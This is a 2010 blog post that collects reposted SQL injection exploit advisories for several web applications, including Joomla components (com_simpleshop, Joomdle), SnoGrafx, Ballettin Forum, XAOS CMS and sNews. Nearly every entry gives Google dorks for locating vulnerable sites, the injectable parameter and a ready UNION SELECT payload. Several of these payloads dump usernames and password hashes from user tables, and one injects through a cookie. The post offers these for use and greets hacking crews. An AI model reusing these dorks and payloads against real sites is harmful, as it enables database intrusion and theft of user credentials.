midads

Monday, 02 August 2010

Bug Sql Injection


Hail Freedom. My congratulations to those of you who are still keen to keep learning and working, whatever your original purpose for carrying out the injection process. Tonight, accompanied by a little coffee left over from the bosses (I am only the maid, you understand), I'll give you a few SQL injection bugs, along with their authors.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Vendor   : http://www.conceptinternetltd.com/ecommerce.php
         http://www.conceptinternetltd.com/brochure.php
# Software : ubuntu 10.04
# Date     : 31/07/2010
# by       : gendenk
# Site     : http://jatimcrew.org
# Dork intext : "Website by conceptinternetltd"

# Exploit : [site]/product_list.php?id=[SQL Injection]
# Exploit : [site]/news.php?id==[SQL Injection]

#######################################
# Demo
# http://localhost/product_desc.php?id=979 [SQL Injection]
# Demo:
# http://localhost/news.php?id=[SQL Injection]
#######################################

Dedicated For : Sekuritionline, Jatimcrew and Hacbox Crew

Life is challenging, the fear of challenges, causing you for backwardness..Facing for the bright future..

#Thanks to :

ALLAH SWT and the Prophet Muhammad SAW, my Father and my late Mother....

Cyberlog, Cr4wl3r, Byz9991, Darkavanger, Newbie_Campuz, Unixcode, Bom2stalker, Phoenixhaxor, Xcyberx, Shamus and MAMA Sri Rahayu [ cyberlog's wife ] Get well soon..
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
########################################################################################

SnoGrafx (cat.php?cat) SQL Injection Vulnerability

########################################################################################

Author : CoBRa_21
Author Web Page : http://ipbul.org
Dork : "powered by SnoGrafx"
Download Page : http://snografx.com/

########################################################################################
 
Sql Injection:
http://localhost/[path]/cat.php?cat=2' (Sql)

########################################################################################
Thanks cyber-warrior.org  &  e-banka.org
########################################################################################
Joomla Component (com_simpleshop) SQL Injection Vulnerability
==============================================================

###########################
Title : Joomla Component (com_simpleshop) SQL Injection Vulnerability
Script : Joomla Galore Simple Shop
Date : 07/26/2010
Author : UnD3rGr0unD W4rri0rZ
Vendor : http://galore.co.za/
Dork : inurl:"option=com_simpleshop" & inurl:"viewprod"
########################### 
         
[ Vulnerable File ]
     
[path]/index.php?option=com_simpleshop&Itemid=xx&task=viewprod&id=[SQL]

[SQL]:

id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--

Xpl
index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--

############################################################## 
#==================================================
#{~} I am HeaDShoT(tunisian muslim hacker) From UnD3rGr0unD W4rri0rZ  {~}
#
#cont@ct:
#pwz@hotmail.Fr
#
#{~} there is always one who intelligent more than you do you should be optimistic  {~}
#==================================================
#all greetZ to allah
#&
# my friends
# M4MIM4N // L363ND //Meher Assel // Ghost_tn //ta3lab el maker // Th3 m3t4l-m4n
#
##############################################################
====================================================================
# Exploit Title: Ballettin Forum Multiple SQL Injection Vulnerability
# Date: 25/07/2010
# Author: 3v0 aka evolution
# Software Link: http://www.ballettin.com
# Tested on: Windows Xp Pack 3
====================================================================
#1 - Vulnerable File
------------------------------------------------------
[+] File: http://www.site.com/alinti.php?mesajid=[SQL]
[+] Exploit: http://www.site.com/alinti.php?mesajid=-6666+UNION+SELECT+sifre+FROM+uyeler+WHERE+id=1

#2 - Insecure Cookie
------------------------------------------------------
javascript:document.cookie="ballettin=-6666 UNION SELECT * FROM uyeler WHERE id=1";
Afterwards, go to http://www.site.com/ust.php
====================================================================
# Exploit Title: XAOS CMS SQL Injection Vulnerability          
# Date: 25/07/2010                           
# Author: H-SK33PY                    
# Software Link: http://www.xaos.it/
# Version: N/A
# Google dork : Powered by XAOS systems
# Platform / Tested on: linux
# Category: webapplications
# Code : [SQLi] & [BSQLi]


   010101010101010101010101010101010101010101010101010101010  
   0                                                       0
   1  Iranian Datacoders Security Team 2010
   0                                                       0
   010101010101010101010101010101010101010101010101010101010

#BUG:#########################################################################

After finding the bug on the site, run this:

http://site.com/index.php?m=1[SQLi]

If you cannot inject, run Blind SQL Injection:

http://site.com/index.php?m=1[BSQLi]



#############################################################################
Website : http://www.datacoders.ir

Special Thanks to : ccC0d3rZzz & all iranian datacoders members

#############################################################################
[!]===========================================================================[!]

[~] Joomla Component Joomdle SQL vulnerability
[~] Author  : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage    : http://www.indonesiancoder.com
[~] Date    : 24 july, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://www.joomdle.com/
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://sourceforge.net/projects/moodle-joomla/files/
[+] Version : 0.24 or lower ;)

[!]===========================================================================[!]

[ Live From JoGJa . . . ]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_joomdle&view=detail&cat_id=1&course_id=[INDONESIANCODER]

[ XpL ]

-999.9'+UNION+ALL+SELECT+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+mdl_user--+and+'kaMtiEz'='kaMtiEz


[ d3m0 ]

http://www.site.com/index.php?option=com_joomdle&view=detail&cat_id=1&course_id=-999.9'+UNION+ALL+SELECT+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+mdl_user--+and+'kaMtiEz'='kaMtiEz
etc etc etc ;]

[ INFO ]

[+] in this component using mdl_user NOT jos_users ;) [+]

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM MainHack MAGELANG CYBER ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW IH-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot,Jack-,Hakz,pl4nkt0n
[+] Contrex,YadoY666,bumble_be,MarahMeraH,newbie_043,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,vYcOd,ayy,otong,CS-31,yur4kh4,MISTERFRIBO,GENI212,anharku


[ NOTE ]

[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM
[+] have neighbours and relatives, and how come they act like d*gs
[+] Poker ;)
[+] alone in the morning, smoking and enjoying the beauty of the morning ;)

[ QUOTE ]

[+] INDONESIANCODER still r0x

########################################################################################

sNews v1.7 (index.php?category) SQL Injection Vulnerability
########################################################################################
Author : CoBRa_21
Author Web Page : http://www.ipbul.org
Dork: "Powered by sNews"
########################################################################################
  
Sql Injection:
http://localhost/[path]/index.php?category=-3 union select 0,version(),2,3,4,5,6,7,8
########################################################################################
Thanks http://e-banka.org & http://www.cyber-warrior.org
########################################################################################
